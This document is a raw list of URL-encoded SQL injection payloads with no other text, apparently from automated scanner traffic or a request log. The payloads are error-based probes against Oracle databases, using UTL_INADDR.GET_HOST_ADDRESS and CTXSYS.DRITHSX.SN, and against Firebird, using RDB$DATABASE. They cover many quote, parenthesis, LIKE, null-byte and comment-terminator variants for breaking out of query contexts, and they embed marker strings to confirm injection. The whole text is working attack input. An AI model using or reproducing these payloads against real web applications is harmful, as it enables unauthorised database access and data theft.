-6049%22%29%29%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22Smkc%22%3D%22Smkc -8994%22%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%22ucQj%22%3D%22ucQj -7361%22%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%22yZMF%22%20LIKE%20%22yZMF -5170%22%29%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22ToPa%22%20LIKE%20%22ToPa -5274%22%29%29%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22tngV%22%20LIKE%20%22tngV -6699%22%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%22xTAr%22%20LIKE%20%22xTAr -2777%25%27%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%27%25%27%3D%27 -2685%25%27%29%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27%25%27%3D%27 -4134%25%27%29%29%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27%25%27%3D%27 -8887%25%27%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%27%25%27%3D%27 -8465%00%27%29%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%27BpNh%27%3D%27BpNh -7413%00%27%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%27Clog%27%3D%27Clog -3722%27%29%20WHERE%205498%3D5498%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20--%20 -8126%22%29%20WHERE%205370%3D5370%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20--%20 -1496%29%20WHERE%203457%3D3457%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20--%20 -4548%27%20WHERE%202636%3D2636%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20--%20 -3904%22%20WHERE%209893%3D9893%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20--%20 -6956%20WHERE%206044%3D6044%20OR%205323%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285323%3D5323%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20--%20 -1606%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29 -8688%27%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29 -5528%27%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29 -1428%22%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29 -9415%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%289938%3D9938 -4363%29%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%283431%3D3431 -5911%29%29%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%289944%3D9944 -9591%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29 -9661%27%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27KzVe%27%3D%27KzVe -6472%27%29%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27IaPI%27%3D%27IaPI -7561%27%29%29%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27eETf%27%3D%27eETf -8880%27%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%27MnDp%27%3D%27MnDp -7949%27%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27UVPR%27%20LIKE%20%27UVPR -4826%27%29%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27sVKw%27%20LIKE%20%27sVKw -7371%27%29%29%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27qdWu%27%20LIKE%20%27qdWu -5637%27%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%27mGwh%27%20LIKE%20%27mGwh -7567%22%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22bxrc%22%3D%22bxrc -8501%22%29%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22ahBX%22%3D%22ahBX -4397%22%29%29%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22zVeI%22%3D%22zVeI -6343%22%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%22WPDZ%22%3D%22WPDZ -8631%22%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22Uavw%22%20LIKE%20%22Uavw -6920%22%29%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22EZWt%22%20LIKE%20%22EZWt -3572%22%29%29%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22JOoQ%22%20LIKE%20%22JOoQ -8089%22%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%22xrsC%22%20LIKE%20%22xrsC -1168%25%27%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 -5020%25%27%29%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 -2601%25%27%29%29%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 -6118%25%27%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%27%25%27%3D%27 -2103%00%27%29%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27ZJPy%27%3D%27ZJPy -5234%00%27%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%27Bnuz%27%3D%27Bnuz -4335%27%29%20WHERE%203062%3D3062%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20--%20 -8308%22%29%20WHERE%209603%3D9603%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20--%20 -2188%29%20WHERE%206875%3D6875%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20--%20 -4183%27%20WHERE%204730%3D4730%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20--%20 -2650%22%20WHERE%209930%3D9930%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20--%20 -9179%20WHERE%201008%3D1008%20OR%201507%3DCTXSYS.DRITHSX.SN%281507%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281507%3D1507%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20--%20 -1554%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29 -9040%27%29%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29 -1787%27%20OR%203783%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%203783%20WHEN%203783%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29 